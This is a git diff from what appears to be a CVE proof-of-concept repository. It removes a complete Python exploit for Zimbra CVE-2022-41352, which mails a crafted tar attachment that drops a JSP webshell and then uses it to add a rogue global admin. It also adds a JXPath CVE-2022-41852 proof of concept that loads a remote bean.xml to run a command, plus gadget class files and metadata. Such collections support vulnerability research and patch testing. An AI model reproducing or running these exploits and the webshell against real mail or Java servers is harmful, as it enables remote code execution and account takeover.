diff --git a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py deleted file mode 100644 index f447f3d2..00000000 --- a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - - - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/README.md b/cve/apache-Commons/2022/CVE-2022-41852/README.md new file mode 100644 index 00000000..8085af9d --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/README.md @@ -0,0 +1,7 @@ +# CVE-2022-41852 + +``` +python3 -m http.server 8080 +java CVE_2022_41852.java +``` +导入pom.xml,同时在bean.xml目录下在8080端口创建web服务器后运行CVE_2022_41852.java,看到8080端口收到了请求,能够弹出计算器 \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java new file mode 100644 index 00000000..d6415004 --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/CVE_2022_41852.java @@ -0,0 +1,13 @@ +import org.apache.commons.jxpath.JXPathContext; + +public class CVE_2022_41852 { + public static void main(String[] args) { + try{ + JXPathContext context = JXPathContext.newContext(null); + String key = (String) context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:8080/bean.xml\")"); + System.out.println(key); + }catch (Exception exception){ + exception.printStackTrace(); + } + } +} diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml new file mode 100644 index 00000000..6f4b0e76 --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/bean.xml @@ -0,0 +1,16 @@ + + + + + + bash + -c + calc.exe + + + + \ No newline at end of file diff --git a/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml new file mode 100644 index 00000000..6657f7df --- /dev/null +++ b/cve/apache-Commons/2022/CVE-2022-41852/target/pom.xml @@ -0,0 +1,31 @@ + + + 4.0.0 + + org.example + poc_cve_2022_41852 + 1.0-SNAPSHOT + + + 8 + 8 + + + + + + org.springframework + spring-context-support + 5.3.23 + + + + commons-jxpath + commons-jxpath + 1.3 + + + + diff --git a/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml new file mode 100644 index 00000000..c5bfe098 --- /dev/null +++ b/cve/apache-Commons/2022/yaml/CVE-2022-41852.yaml @@ -0,0 +1,18 @@ +id: CVE-2022-41852 +source: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47061 +info: + name: JXPath是apache公司提供的XPath的java实现,JXPath 提供了用于遍历 JavaBean、DOM 和其他类型的对象的图形的 API,同时提供了一套扩展机制使我们可以增加对这些对象之外的其他对象模型的支持(重点). + severity: CRITICAL + description: + 使用JXPath解释不受信任的XPath表达式的人可能容易受到远程代码执行攻击。处理XPath字符串的所有JXPathContext类函数都是易受攻击的,除了compile和compileath函数。XPath表达式可以被攻击者用来从类路径加载任何Java类,从而导致代码执行。 + scope-of-influence: + Apache Commons JXpath <= 1.3 + reference: + - https://blog.csdn.net/Xxy605/article/details/127303526 + classification: + cvss-metrics: Google Inc. AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H + cve-id: CVE-2022-41852 + cwe-id: None + cnvd-id: None + kve-id: None + tags: CVE-2022, Apache Commons Jxpath diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class new file mode 100644 index 00000000..b67caf0a Binary files /dev/null and b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/DubboGadget.class differ diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$Foo.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$Foo.class new file mode 100644 index 00000000..30585cf9 Binary files /dev/null and b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$Foo.class differ diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class new file mode 100644 index 00000000..d58f75bf Binary files /dev/null and b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils$StubTransletPayload.class differ diff --git a/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class new file mode 100644 index 00000000..4cabf006 Binary files /dev/null and b/cve/apache-Dubbo/2019/CVE-2019-17564/target/classes/DubboGadget/Utils.class differ diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b6df6461..2d037bdc 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -46,6 +46,7 @@ cve: - CVE-2022-32532 apache-Commons: - CVE-2022-33980 + - CVE-2022-41852 influx-DB: - CVE-2019-20933 linux-kernel: